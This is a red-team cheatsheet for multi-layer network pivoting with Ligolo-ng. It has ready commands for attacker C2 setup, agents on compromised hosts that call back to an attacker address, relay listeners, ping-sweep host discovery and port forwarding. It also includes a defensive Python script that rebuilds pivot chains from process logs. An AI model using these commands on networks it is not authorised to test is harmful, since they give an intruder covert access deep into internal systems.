Pivoting Cheatsheet

Initial Setup (Attacker C2)

Create TUN interfaces and routes on your C2 before each pivot layer:

# Interface for pivot 1
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up

# Interface for pivot 2
sudo ip tuntap add user $(whoami) mode tun ligolo2
sudo ip link set ligolo2 up

# Interface for pivot 3
sudo ip tuntap add user $(whoami) mode tun ligolo3
sudo ip link set ligolo3 up

On Ligolo-ng >= v0.6 use interface_create --name ligolo from the proxy CLI instead of ip tuntap.


Pivot 1 — Initial Foothold

C2: Start proxy listener

./proxy -selfcert -laddr 0.0.0.0:<lport>

Target 1 (Linux): Transfer and run agent

./agent -connect <attacker-ip>:<lport> -ignore-cert

Target 1 (Windows):

.\agent.exe -connect <attacker-ip>:<lport> -ignore-cert

C2 proxy console: Select session and start tunnel

ligolo-ng » session
[select session]
ligolo-ng » start --tun ligolo

C2: Add route to pivot 1 subnet

sudo ip route add <subnet-1>/24 dev ligolo

Discover hosts in pivot 1 subnet (Linux):

for i in {1..254}; do (ping -c 1 <subnet-1>.$i | grep "bytes from" &); done

Discover hosts in pivot 1 subnet (Windows):

for /L %i in (1,1,254) do ping <subnet-1>.%i -n 1 -w 100 | find "Reply"

Pivot 2 — Double Pivot

C2 proxy console (session 1 still active): Add listener to relay agent connections through Target 1

[Agent : target1] » listener_add --addr 0.0.0.0:<lport> --to 127.0.0.1:<lport> --tcp

Target 2 (Windows): Run agent pointing at Target 1

.\agent.exe -connect <target1-ip>:<lport> -ignore-cert

Target 2 (Linux):

./agent -connect <target1-ip>:<lport> -ignore-cert

C2 proxy console: Select the new session (Target 2) and start tunnel on ligolo2

ligolo-ng » sessions
[select Target 2 session]
ligolo-ng » start --tun ligolo2

C2: Add route to pivot 2 subnet

sudo ip route add <subnet-2>/24 dev ligolo2

Pivot 3 — Triple Pivot

C2 proxy console (session 2 active): Add listener on Target 2 to relay to C2

[Agent : target2] » listener_add --addr 0.0.0.0:<lport> --to 127.0.0.1:<lport> --tcp

Target 3 (Windows): Run agent pointing at Target 2

.\agent.exe -connect <target2-ip>:<lport> -ignore-cert

Target 3 (Linux):

./agent -connect <target2-ip>:<lport> -ignore-cert

C2 proxy console: Select the new session (Target 3) and start tunnel on ligolo3

ligolo-ng » sessions
[select Target 3 session]
ligolo-ng » start --tun ligolo3

C2: Add route to pivot 3 subnet

sudo ip route add <subnet-3>/24 dev ligolo3
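
For responders, the chain above leaves a trail in process-creation telemetry: each agent's -connect target is either the proxy or the previous pivot host. The following is an added example, not code from the original cheatsheet or the Ligolo-ng project, that rebuilds pivot depth from such events. The event tuple format, host names, addresses and port are constructed assumptions.

```python
import re

# Matches the agent flag used on this page: -connect <host>:<port>.
# Keyed on the flag, not the binary name, so a renamed agent still matches.
CONNECT_RE = re.compile(r"(?<![\w-])-connect\s+(\S+):(\d+)")

# Constructed process-creation events: (hostname, host IP, command line).
SAMPLE_EVENTS = [
    ("web01", "10.10.1.5", "./agent -connect 203.0.113.10:8443 -ignore-cert"),
    ("web01", "10.10.1.5", "/usr/sbin/sshd -D"),
    ("files02", "10.10.2.7", r".\agent.exe -connect 10.10.1.5:8443 -ignore-cert"),
    ("db03", "10.10.3.9", "./agent -ignore-cert -connect 10.10.2.7:8443"),
    ("app04", "10.10.1.8", "curl -connect-timeout 5 https://example.com"),
]


def find_agents(events):
    """Map host IP -> agent details for command lines carrying -connect host:port."""
    agents = {}
    for host, ip, cmdline in events:
        m = CONNECT_RE.search(cmdline)
        if m:
            agents[ip] = {
                "host": host,
                "target": m.group(1),
                "port": int(m.group(2)),
                # Skipping certificate validation raises confidence in the match.
                "ignore_cert": "-ignore-cert" in cmdline,
            }
    return agents


def pivot_chain(events):
    """Return sorted (depth, host, target): depth 1 egresses to the proxy itself."""
    agents = find_agents(events)

    def hops(ip, seen=()):
        target = agents[ip]["target"]
        # A target that is not another agent host (or a loop) ends the chain.
        if target not in agents or target in seen + (ip,):
            return 1
        return 1 + hops(target, seen + (ip,))

    return sorted((hops(ip), a["host"], a["target"]) for ip, a in agents.items())


if __name__ == "__main__":
    for depth, host, target in pivot_chain(SAMPLE_EVENTS):
        print(f"pivot {depth}: {host} -> {target}")
```

The depth-1 target is the address to block and hunt for at the perimeter; deeper entries identify internal hosts that are relaying for other agents.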

Port Forwarding Local Ports

Ligolo-ng uses the hardcoded CIDR 240.0.0.0/4 (multicast space) to redirect agent-local ports to your C2.

Forward a port on Target 1 (pivot 1 interface):

sudo ip route add 240.0.0.1/32 dev ligolo

Forward a port on Target 2 (pivot 2 interface):

sudo ip route add 240.0.0.2/32 dev ligolo2

Then access Target 1's local port 8080 as 240.0.0.1:8080 from your C2. Each interface gets a different 240.0.0.x address.


Quick Reference

Action                       Command
---------------------------  ------------------------------------------------------------------
List sessions                sessions
Start tunnel (pivot 1)       start --tun ligolo
Start tunnel (pivot 2)       start --tun ligolo2
Add listener relay           listener_add --addr 0.0.0.0:<lport> --to 127.0.0.1:<lport> --tcp
Show agent interfaces        ifconfig
Create interface (>=0.6)     interface_create --name ligolo
Add route via CLI (>=0.6)    interface_add_route --name ligolo --route <subnet>/24
List listeners               listener_list
Stop listener                listener_stop <id>